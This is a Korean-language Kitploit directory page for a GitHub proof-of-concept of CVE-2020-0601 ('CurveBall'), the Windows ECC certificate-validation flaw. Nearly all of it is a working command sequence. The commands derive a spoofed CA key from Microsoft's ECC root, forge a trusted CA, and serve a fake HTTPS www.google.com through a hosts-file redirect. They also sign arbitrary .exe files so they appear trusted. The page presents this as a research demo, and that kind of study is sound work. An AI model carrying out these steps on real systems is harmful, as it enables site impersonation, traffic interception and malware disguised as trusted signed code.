Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2020-0601_PoC — CVE-2020-0601, 일명 curveball의 데모. https://github.com/kudelskisecurity/chainoffools 및 https://github.com/ly4k/CurveBall에서 제공되는 PoC를 기반으로 합니다. | Kitploit
도구/GitHubGitHub/joelbts/cve-2020-0601_poc
Vulnerability AnalysisCode AnalysisExploitationWeb SecurityCryptographyPenetration Testing
GitHubjoelbts/cve-2020-0601_poc

CVE-2020-0601_PoC

CVE-2020-0601, 일명 curveball의 데모. https://github.com/kudelskisecurity/chainoffools 및 https://github.com/ly4k/CurveBall에서 제공되는 PoC를 기반으로 합니다.

저장소 보기
272년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

POC 기반: https://github.com/ly4k/CurveBall

https://research.kudelskisecurity.com/2020/01/15/cve-2020-0601-the-chainoffools-attack-explained-with-poc/

https://github.com/kudelskisecurity/chainoffools?tab=readme-ov-file


요구사항/사용된 소프트웨어


python 버전 3.11 openssl 버전 3.1 osslsigncode 버전 2.5 gen-key.py httpServer.py 내 파이썬 라이브러리


TLS 인증서 서명


신뢰할 수 있는 루트 인증서에서 스푸핑된 CA 키 생성 (secp384r1 및 PEM 형식이어야 함)

python gen-key.py MicrosoftECCProductRootCertificateAuthority.cer

스푸핑된 키를 사용하여 스푸핑된 CA 생성

openssl req -new -x509 -key spoofed-ca-key.pem -out spoofed-ca.pem -config ca.cnf

스푸핑된 CA에 의해 서명될 다른 SSL 인증서 생성 (모든 종류)

openssl ecparam -name secp384r1 -genkey -noout -out cert.key

인증서에 대한 인증서 서명 요청 생성

openssl req -new -key cert.key -out cert.csr -config openssl.cnf -reqexts v3_req

스푸핑된 CA 인증서를 사용하여 CSR 서명

openssl x509 -req -in cert.csr -CA spoofed-ca.pem -CAkey spoofed-ca-key.pem -CAcreateserial -out cert.crt -days 10000 -extfile openssl.cnf -extensions v3_req

스푸핑된 인증서 체인으로 HTTPS 서버 시작

python httpServer.py

WINDOWS 시스템에서

<kali.machine.ip> www.google.com을 hosts 파일에 추가 (google을 서버로 리디렉션)

HTTPS://www.google.com 방문

인증서가 신뢰되어야 하며, 'Hello World'가 표시되어야 함

오류 발생 시 시스템 시간이 올바른지 확인


코드 서명


신뢰할 수 있는 루트 인증서에서 스푸핑된 CA 키 생성 (secp384r1 및 PEM 형식이어야 함)

python gen-key.py MicrosoftECCProductRootCertificateAuthority.cer

스푸핑된 키를 사용하여 스푸핑된 CA 생성

openssl req -new -x509 -key spoofed-ca-key.pem -out spoofed-ca.pem -config ca-cs.cnf

코드 서명에 사용할 수 있는 새 키 생성

openssl ecparam -name secp384r1 -genkey -noout -out cert.key

서명할 수 있는 키를 사용하여 인증서 서명 요청 생성

openssl req -new -key cert.key -out cert.csr -config openssl-cs.cnf -reqexts v3_req

스푸핑된 CA를 사용하여 CSR 서명

openssl x509 -req -in cert.csr -CA spoofed-ca.pem -CAkey spoofed-ca-key.pem -CAcreateserial -out cert.crt -days 10000 -extfile openssl-cs.cnf -extensions v3_req

키, 인증서 및 스푸핑된 CA를 PKCS12 파일로 패키징하여 EXE 서명에 사용

openssl pkcs12 -export -in cert.crt -inkey cert.key -certfile spoofed-ca.pem -name "Code Signing" -out cert.p12

PKCS12 파일을 사용하여 실행 파일 서명

osslsigncode sign -pkcs12 cert.p12 -n "Signed by curveball" -in filename.exe -out filename_signed.exe

도구 다운로드